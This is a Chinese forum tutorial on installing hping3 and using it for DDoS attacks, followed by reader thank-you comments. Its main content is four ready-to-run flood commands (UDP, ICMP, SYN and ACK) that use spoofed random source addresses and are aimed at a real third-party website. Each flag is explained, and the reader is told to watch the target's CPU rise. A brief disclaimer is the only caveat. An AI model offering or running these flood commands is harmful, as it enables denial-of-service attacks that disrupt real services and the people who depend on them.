#干货满满#ddos工具之hping3的安装和使用

仅供大家学习与参考，未经所有者同意，请勿攻击网站！

     上篇我们讲了DOS/DDOS的区别，本篇我给大家分享下hping这个工具，Hping是一个命令行下使用的TCP/IP数据包组装/分析工具，其命令模式很像Unix下的ping命令，但是它不是只能发送ICMP回应请求，它还可以支持TCP、UDP、ICMP和RAW-IP协议，它有一个路由跟踪模式，能够在两个相互包含的通道之间传送文件。Hping常被用于检测网络和主机在日常的运维工作中，分析网络环境，故障排除时，经常会用到ping命令，但是由于ddos攻击等，越来越多的主机当前都是默认禁止ping命令的，并且ping命令由于是通过ICMP协议进行网络通信的，对于一些tcp/udp的检测就不是那么满足，所以就有了hping这个命令。

安装

[root@localhost ~]# yum install -y hping3

[root@localhost ~]# hping

hping3> ^C

[root@localhost ~]#

hping主要是进行DDOS攻击的

1、UDP ddos攻击：

      hping3 -c 10000 -d 120 --udp -w 64 -p 80 --flood --rand-source www.baidu.com

2、ICMP  ddos攻击：

      hping3 -c 10000 -d 120 --icmp -w 64 -p 80 --flood --rand-source www.baidu.com

3、SYN ddos攻击：

      hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source www.baidu.com

4、ACK ddos攻击：

       hping3 -c 10000 -d 120 -A -w 64 -p 80 --flood --rand-source www.baidu.com

参数含义：

hping= 应用名称.

-c 100000 =packets 发送的数量.

-d 120 = packet的大小.

-S = 只发送SYN packets.

-w 64 = TCP window的大小.

-p 21 = Destination port (21 being FTP port). 可以使用任意端口.

--flood = Sending packets as fast as possible, 不显示回应. Flood mode.

--rand-source = 使用随机的Source IP Addresses. 或者使用 -a or spoof to hide hostnames.

www.hping3testsite.com = Destination IP address or target machines IP address. 或者使用 一个网址 In my case resolves to 127.0.0.1 (as entered in /etc/hosts file)

执行上述命令后在目标机上打开任务管理器查看CPU的利用率，你会发现明显提高了

未synflood：

synflood后：

感谢楼主分享！文章对了解常见DDOS工具很有帮助，但对于为什么主机禁ping描述并不是很贴切，如增加更多工具详细使用方法，区别步骤讲解会更通俗易懂，期待楼主带来更多有价值的文章

楼主的文章图文并茂，清晰易懂，看完这波操作可以轻松上手了，如遇到问题再向楼主请教~

感谢分享                                                                 

感谢楼主分享，学习一下

感谢楼主分享，学习一下

感谢楼主分享，学习一下

感谢楼主分享，学习一下

感谢楼主分享，学习一下

感谢楼主分享，学习一下

感谢楼主分享，学习一下